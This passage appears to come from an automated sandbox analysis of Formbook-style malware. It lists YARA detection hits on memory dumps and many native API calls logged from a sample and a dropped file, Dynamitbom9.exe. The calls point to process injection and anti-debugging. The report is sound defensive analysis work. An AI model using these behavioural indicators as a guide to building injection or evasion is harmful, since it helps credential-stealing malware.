    Source: 00000021.00000002.2552234580.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001F.00000002.2490871348.000000000245D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000002.1285866983.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000022.00000000.2551368567.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000C.00000000.1278653334.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000001F.00000000.2384926370.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000002.1094577858.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000000.1236138459.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000000.1066109645.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Potential malicious icon found
    Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Process Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197C0A NtResumeThread,0_2_02197C0A
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197829 NtProtectVirtualMemory,0_2_02197829
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02190722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,0_2_02190722
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_021929F9 NtWriteVirtualMemory,0_2_021929F9
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197C17 NtResumeThread,0_2_02197C17
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192A09 NtWriteVirtualMemory,0_2_02192A09
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_0219083D NtSetInformationThread,TerminateProcess,0_2_0219083D
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197E9B NtResumeThread,0_2_02197E9B
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192E9E NtWriteVirtualMemory,0_2_02192E9E
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192CBD NtWriteVirtualMemory,0_2_02192CBD
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_021980A5 NtResumeThread,0_2_021980A5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192AD9 NtWriteVirtualMemory,0_2_02192AD9
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_021982D5 NtResumeThread,0_2_021982D5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197CC3 NtResumeThread,0_2_02197CC3
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197F37 NtResumeThread,0_2_02197F37
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_0219076D NtSetInformationThread,TerminateProcess,0_2_0219076D
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192D9E NtWriteVirtualMemory,0_2_02192D9E
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192FD1 NtWriteVirtualMemory,0_2_02192FD1
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02192BC5 NtWriteVirtualMemory,0_2_02192BC5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197DFF NtResumeThread,0_2_02197DFF
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_02197FE1 NtResumeThread,0_2_02197FE1
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_021981E5 NtResumeThread,0_2_021981E5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00567829 NtProtectVirtualMemory,2_2_00567829
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00560722 EnumWindows,NtSetInformationThread,NtProtectVirtualMemory,TerminateProcess,LdrInitializeThunk,2_2_00560722
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_0056083D NtSetInformationThread,TerminateProcess,2_2_0056083D
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00560ADD NtProtectVirtualMemory,2_2_00560ADD
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_0056076D NtSetInformationThread,TerminateProcess,2_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7C0A NtResumeThread,3_2_021A7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7829 NtProtectVirtualMemory,3_2_021A7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A0722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,3_2_021A0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A29F9 NtWriteVirtualMemory,3_2_021A29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7C17 NtResumeThread,3_2_021A7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2A09 NtWriteVirtualMemory,3_2_021A2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A083D NtSetInformationThread,TerminateProcess,3_2_021A083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7E9B NtResumeThread,3_2_021A7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2E9E NtWriteVirtualMemory,3_2_021A2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2CBD NtWriteVirtualMemory,3_2_021A2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A80A5 NtResumeThread,3_2_021A80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2AD9 NtWriteVirtualMemory,3_2_021A2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A82D5 NtResumeThread,3_2_021A82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7CC3 NtResumeThread,3_2_021A7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7F37 NtResumeThread,3_2_021A7F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A076D NtSetInformationThread,TerminateProcess,3_2_021A076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2D9E NtWriteVirtualMemory,3_2_021A2D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2FD1 NtWriteVirtualMemory,3_2_021A2FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A2BC5 NtWriteVirtualMemory,3_2_021A2BC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7DFF NtResumeThread,3_2_021A7DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A7FE1 NtResumeThread,3_2_021A7FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_021A81E5 NtResumeThread,3_2_021A81E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7C0A NtResumeThread,5_2_021B7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7829 NtProtectVirtualMemory,5_2_021B7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B0722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,5_2_021B0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B29F9 NtWriteVirtualMemory,5_2_021B29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7C17 NtResumeThread,5_2_021B7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2A09 NtWriteVirtualMemory,5_2_021B2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B083D NtSetInformationThread,TerminateProcess,5_2_021B083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7E9B NtResumeThread,5_2_021B7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2E9E NtWriteVirtualMemory,5_2_021B2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2CBD NtWriteVirtualMemory,5_2_021B2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B80A5 NtResumeThread,5_2_021B80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2AD9 NtWriteVirtualMemory,5_2_021B2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B82D5 NtResumeThread,5_2_021B82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7CC3 NtResumeThread,5_2_021B7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7F37 NtResumeThread,5_2_021B7F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B076D NtSetInformationThread,TerminateProcess,5_2_021B076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2D9E NtWriteVirtualMemory,5_2_021B2D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2FD1 NtWriteVirtualMemory,5_2_021B2FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B2BC5 NtWriteVirtualMemory,5_2_021B2BC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7DFF NtResumeThread,5_2_021B7DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B7FE1 NtResumeThread,5_2_021B7FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 5_2_021B81E5 NtResumeThread,5_2_021B81E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A750 NtCreateFile,LdrInitializeThunk,6_2_1F48A750
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A700 NtProtectVirtualMemory,LdrInitializeThunk,6_2_1F48A700
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A720 NtResumeThread,LdrInitializeThunk,6_2_1F48A720
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A610 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_1F48A610
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A6A0 NtCreateSection,LdrInitializeThunk,6_2_1F48A6A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A540 NtDelayExecution,LdrInitializeThunk,6_2_1F48A540
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A560 NtQuerySystemInformation,LdrInitializeThunk,6_2_1F48A560
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A5F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_1F48A5F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A410 NtQueryInformationToken,LdrInitializeThunk,6_2_1F48A410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A480 NtMapViewOfSection,LdrInitializeThunk,6_2_1F48A480
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A4A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_1F48A4A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A360 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_1F48A360
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A3E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_1F48A3E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A240 NtReadFile,LdrInitializeThunk,6_2_1F48A240
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A2D0 NtClose,LdrInitializeThunk,6_2_1F48A2D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A710 NtQuerySection,6_2_1F48A710
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A780 NtOpenDirectoryObject,6_2_1F48A780
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A650 NtQueueApcThread,6_2_1F48A650
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A6D0 NtCreateProcessEx,6_2_1F48A6D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48BD40 NtSuspendThread,6_2_1F48BD40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A520 NtEnumerateKey,6_2_1F48A520
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A5A0 NtWriteVirtualMemory,6_2_1F48A5A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A460 NtOpenProcess,6_2_1F48A460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A470 NtSetInformationFile,6_2_1F48A470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48B470 NtOpenThread,6_2_1F48B470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48B410 NtOpenProcessToken,6_2_1F48B410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A430 NtQueryVirtualMemory,6_2_1F48A430
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48ACE0 NtCreateMutant,6_2_1F48ACE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A350 NtQueryValueKey,6_2_1F48A350
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A370 NtQueryInformationProcess,6_2_1F48A370
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A310 NtEnumerateValueKey,6_2_1F48A310
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A3D0 NtCreateKey,6_2_1F48A3D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A260 NtWriteFile,6_2_1F48A260
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48A220 NtWaitForSingleObject,6_2_1F48A220
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 6_2_1F48BA30 NtSetContextThread,6_2_1F48BA30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A2F0 NtQueryInformationFile,6_2_1F48A2F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A800 NtSetValueKey,6_2_1F48A800
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48B0B0 NtGetContextThread,6_2_1F48B0B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567829 NtProtectVirtualMemory,6_2_00567829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567C0A NtSetInformationThread,6_2_00567C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_0056083D NtSetInformationThread,6_2_0056083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_005680A5 NtSetInformationThread,6_2_005680A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_005681E5 NtSetInformationThread,6_2_005681E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_005682D5 NtSetInformationThread,6_2_005682D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00560ADD NtProtectVirtualMemory,6_2_00560ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567C17 NtSetInformationThread,6_2_00567C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567CC3 NtSetInformationThread,6_2_00567CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567DFF NtSetInformationThread,6_2_00567DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567E9B NtSetInformationThread,6_2_00567E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_0056076D NtSetInformationThread,6_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567F37 NtSetInformationThread,6_2_00567F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567FE1 NtSetInformationThread,6_2_00567FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02147829 NtProtectVirtualMemory,8_2_02147829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02140722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,8_2_02140722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_021429F9 NtWriteVirtualMemory,8_2_021429F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142A09 NtWriteVirtualMemory,8_2_02142A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_0214083D NtSetInformationThread,TerminateProcess,8_2_0214083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142E9E NtWriteVirtualMemory,8_2_02142E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142CBD NtWriteVirtualMemory,8_2_02142CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142AD9 NtWriteVirtualMemory,8_2_02142AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_0214076D NtSetInformationThread,TerminateProcess,8_2_0214076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142D9E NtWriteVirtualMemory,8_2_02142D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142FD1 NtWriteVirtualMemory,8_2_02142FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142BC5 NtWriteVirtualMemory,8_2_02142BC5
    Source: C:\Windows\explorer.exeCode function: 9_2_05E08852 NtDeleteFile,NtCreateFile,NtReadFile,NtWriteFile,NtClose,9_2_05E08852
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A750 NtCreateFile,LdrInitializeThunk,10_2_1F47A750
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A700 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1F47A700
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A720 NtResumeThread,LdrInitializeThunk,10_2_1F47A720
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A610 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1F47A610
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A6A0 NtCreateSection,LdrInitializeThunk,10_2_1F47A6A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A540 NtDelayExecution,LdrInitializeThunk,10_2_1F47A540
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A560 NtQuerySystemInformation,LdrInitializeThunk,10_2_1F47A560
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A5F0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1F47A5F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A410 NtQueryInformationToken,LdrInitializeThunk,10_2_1F47A410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A480 NtMapViewOfSection,LdrInitializeThunk,10_2_1F47A480
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A4A0 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1F47A4A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A360 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1F47A360
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A3E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1F47A3E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A240 NtReadFile,LdrInitializeThunk,10_2_1F47A240
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A2D0 NtClose,LdrInitializeThunk,10_2_1F47A2D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A710 NtQuerySection,10_2_1F47A710
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A780 NtOpenDirectoryObject,10_2_1F47A780
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A650 NtQueueApcThread,10_2_1F47A650
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A6D0 NtCreateProcessEx,10_2_1F47A6D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47BD40 NtSuspendThread,10_2_1F47BD40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A520 NtEnumerateKey,10_2_1F47A520
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A5A0 NtWriteVirtualMemory,10_2_1F47A5A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A460 NtOpenProcess,10_2_1F47A460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47B470 NtOpenThread,10_2_1F47B470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A470 NtSetInformationFile,10_2_1F47A470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47B410 NtOpenProcessToken,10_2_1F47B410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A430 NtQueryVirtualMemory,10_2_1F47A430
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47ACE0 NtCreateMutant,10_2_1F47ACE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A350 NtQueryValueKey,10_2_1F47A350
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A370 NtQueryInformationProcess,10_2_1F47A370
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A310 NtEnumerateValueKey,10_2_1F47A310
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A3D0 NtCreateKey,10_2_1F47A3D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A260 NtWriteFile,10_2_1F47A260
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A220 NtWaitForSingleObject,10_2_1F47A220
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47BA30 NtSetContextThread,10_2_1F47BA30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A2F0 NtQueryInformationFile,10_2_1F47A2F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A800 NtSetValueKey,10_2_1F47A800
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47B0B0 NtGetContextThread,10_2_1F47B0B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567829 NtProtectVirtualMemory,10_2_00567829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567C0A NtSetInformationThread,10_2_00567C0A
